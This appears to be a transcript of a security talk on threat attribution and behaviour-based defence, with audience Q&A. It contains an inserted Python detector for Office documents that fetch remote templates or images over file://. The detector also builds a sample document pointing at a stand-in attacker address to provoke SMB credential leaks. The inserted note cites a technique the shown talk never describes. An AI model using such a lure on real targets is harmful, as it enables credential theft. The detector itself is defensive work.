your capabilities are what you're presenting of value to a malicious actor and then figuring out like okay now what do i do you know i don't necessarily have to worry about you know these things over here but maybe if i'm a clear defense contractor i really need to worry about foreign governments breaking in stealing plans to the f-35 there might be some that haven't been stolen yet i don't know but if there are those are still out there um so really you know shaping what it is that prevent that presents itself as a threat to you and how that's going to act so that you know how to orient your environment start taking strategic decisions again

the keynote this morning was very excellent on this front because you know this goes into the aspect where as defenders ultimately we kind of own our environment maybe not as much as we like because there's a i t and i.t security divide but we can take actions to shape manage and otherwise contort that rit environment to fit our defensive needs setting up strategic network choke points for monitoring or blocking purposes establishing baselines in terms of system uh health system application and whatnot in order to meet the challenges that we face with particular adversaries trying to devise ways that for the threats that we face that we can you know lay as many i thought it was

really excellent bear traps and alligators and dinosaurs and other stuff to make it just a royal pain for the adversary to break in that's something that we can control and having an idea for what it is that we need to protect and how we need to go about doing that enables this sort of activity so ultimately you know going to the lazarus example and something we talked about very early is differentiating between actors campaigns and ttps so when looking at entities don't just think that you have monolithic groups that correspond to some magical nation state in the sky that are coming after you no you have different bureaucratic organizations different units of whatever is people liberation cyber army

national force or whatever that are all competing against each other to hit their metrics for the month that all have slightly different targeting profiles and different ways of operating don't fall into the trap of thinking that everyone's going to operate alike but rather break this out into how each individual group that you can observe operates within the scope of what you need to respond to as a defender from the profile of your organization also note that you know campaigns shift over time as well you know one of the things that i think is confusing with the daimloy alanite and going all the way back to dragonfly example is there is a lot of similarity here you

can look at these as being campaigns that have been executed by probably the same command authority over time against very similar targets but they've shifted over time so is that because you've had a evolution in tactics over time farming this out to different operational groups because the first one was out of rotation or didn't do a good enough job but understanding that these things aren't going to be static and shaping to the ttps that are observed within the environment it's critical to you know keep up with this problem you know there's the myth of that myth the legend of the red queen that you know she keeps running and we keep getting halfway there well that's insufficient

because we're never going to catch her so you need to figure out a way to beat the damn red queen beat her over the head with something and overtake her in this case by trying to come up with an idea of anticipating behavior within the network environment how attack's gonna look so you can shape your defense to match what your adversary is most likely to do so let's try and draw this to a close attribution's really good when it's properly focused and it's pretty damn useless when it's not uh identifying activities oops there we go there we go identifying activities provides an actionable information to defenders you want to look for things that are going to assist you know if

your management gonna help your people do their job if you're one of those people something that's gonna assist me in making my network safer or facilitating my ability to respond and remediate in my environment doing that means you focus on observables you know when you assume you make an ass out of you and me don't just try and read things in because of who you think is responsible base your conceptions of what this activity looks like off of the evidence that you have at hand and what you're able to collect through other sources you know it doesn't just mean that everything that hits me forms my data set no you have to go out and do

research go pull public reports go to public data sets try and build a broader profile not just what was used against you to really get a grasp for how the activity works and maybe there's different groups that all align to a similar set of capabilities but are applying them in different ways such as we saw with the broad scope of lazarus activity so really what we're trying to go after because we all like things that are you know graphically focused and go a to b to c it's a process is that we want to have an activity that we can narrow down define note observable items determine their operational purpose and then align those observations

because there's no going to be no one size fits all to a lot of this activity if you don't work to relate this specifically to your environment and needs you're doing something wrong so you want to make sure that you align those observations and coming up with defensive planning to your needs and your network so characterize the activities you observe them group them into you know holes that make sense you know entities that make sense and orient to the targets and perceived interests for your organization and for your perceived adversary and then based upon all that you can then define a group around the characteristics you've observed you'd focus on that observable behavior and build your detection and defenses

around that and now you've derived it in my opinion a much more robust way of identifying tracking and defending against malicious activity so that's all i've got and i've got a lot of time left so questions comments rotten fruit yes
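The check a defender would want for the file:// technique described in the talk (the outbound SMB authentication that both the Dymalloy PNG reference and the Allanite settings.xml template reference provoke), added here as an example and not part of the talk or of Dragos's tooling: scan an Office document's relationship parts for external file:// or UNC targets. The sample document builder, the hypothetical part layout it writes, and the 198.51.100.10 address are constructed for illustration.

```python
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET  # use defusedxml for untrusted input in production
from dataclasses import dataclass

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# A Target that makes Word reach out over SMB when the document is opened:
# a file:// URL or a UNC path (\\host\share\...).
SMB_TARGET = re.compile(r"^(?:file:(?://|\\\\)|\\\\)", re.IGNORECASE)


@dataclass(frozen=True)
class ExternalRef:
    part: str       # .rels part the relationship lives in
    rel_type: str   # short relationship type, e.g. "attachedTemplate" or "image"
    target: str     # the external target as written in the document


def find_smb_callouts(docx_bytes: bytes) -> list[ExternalRef]:
    """Return every external relationship whose target would trigger an
    outbound SMB connection (and a Windows authentication attempt) on open."""
    hits: list[ExternalRef] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                # Internal relationships point inside the package and are harmless here.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if SMB_TARGET.match(target):
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append(ExternalRef(name, short_type, target))
    return hits


def build_sample_docx(template_target: str, image_target: str) -> bytes:
    """Construct a minimal .docx container (constructed for this example, not a
    real lure) carrying the two shapes from the talk: an external attached
    template in settings.xml.rels and an external image in document.xml.rels,
    plus a benign https hyperlink and an internal part as controls."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/attachedTemplate" '
        f'Target="{template_target}" TargetMode="External"/>'
        '</Relationships>'
    )
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/hyperlink" '
        'Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}/image" '
        f'Target="{image_target}" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OFFICE_REL}/styles" Target="styles.xml"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder parts only
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", document_rels)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # 198.51.100.10 is a documentation address standing in for an adversary-controlled IP.
    sample = build_sample_docx(
        "file://198.51.100.10/share/Normal.dotm",
        "file://198.51.100.10/share/logo.png",
    )
    for ref in find_smb_callouts(sample):
        print(f"{ref.part}: {ref.rel_type} -> {ref.target}")
```

Run the same scan over mail-gateway attachments or a sandbox's extracted documents; an outbound 445 block at the perimeter is the complementary control the talk alludes to.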

Okay, sometimes, isn't it true that sometimes the country attribution is important from a political standpoint? You get people to act on the indication of compromise, to get them to look for those, because...

Potentially. So the question, for those who couldn't hear: sometimes is it important to have this attribution-by-country perspective, because if you don't tell someone "hey, the Russians are in your network," they're gonna blow it off, like "I don't care, we have intrusions all the time"? I would say that might very well be true, but I would say that perspective is terrible. So the way that I would look at it is, if you're defending a network, first off, going back to the silly Prussian king example earlier, you're never going to defend everything all the time, so you have to accept and anticipate you're going to get compromised. You can't just defeat everything at the front door.

But you really should be approaching this from a "hey, if someone, staying within my realm, breaks into my process control network for an electric utility, I don't care who the hell it is; that bothers me." It could be the Russians, it could be the Botswanans, it could be whoever; I need to start reacting. So I think it's intellectual laziness on the part of defenders, information security, to make the assumption that it's, like, crimeware or whatever, who cares. Well, like, hasn't there been the case of certain actors behind large crimeware campaigns who also moonlight doing things like shooting Zeus out there, and their day job happens to be working in an office building in St. Petersburg with people with guns in it and whatnot?

So really, it goes back to that idea of a cognitive bias that we're setting up, that just because of who's involved, I either should care, shouldn't care, or here's how they'll operate. I think that some people might use that as a way of triaging, like "oh, it's just some script kiddies in Eastern Europe or whatever, I don't care, they can mine some bitcoins and I'll kick them out." But that's the wrong way of approaching it, because that goes back to the who I'm assuming is in my network versus how they're acting, which is the whole point of this: instead of going for who you think it is, go for how they're acting and base your response off of that. Is that helpful? Okay. Yes.

For nations, for, like, assigned to nation states...

So the value, in my opinion, it's here.

Yeah, no. So from that, this is why. So really, the way that I'm looking at this is Dymalloy is a placeholder; it's really just a signifier for something else. Could be anything, could be Martians for all I care, but it's a collection of observables that I get an idea for: okay, when I see Dymalloy, I know that you'll probably see, unless they've changed and thus have shifted into something completely new, commodity-like malware, the use of phishing for credential capture, RDP for initial access, with an ultimate goal of data capture and further pivoting within the network. It gives me an idea for what this intrusion activity looks like, in order to do things like the playbook example: all right, if I see this collection of activities, or some of these, these are the follow-on questions that I should be asking as a way to focus my investigation and my response. It also lets me, from a targeting perspective, and going to that intelligence aspect, say: all right, I know that this thing I'll call Dymalloy happens to be really interested in these industrial verticals; I'm part of this industrial vertical; I better make sure that I'm paying attention to how these guys operate, even if I don't want to maybe prioritize resources on browser-based cryptocurrency mining. So does that help? Okay, all right, I've given you five minutes back.

Thank you, everyone.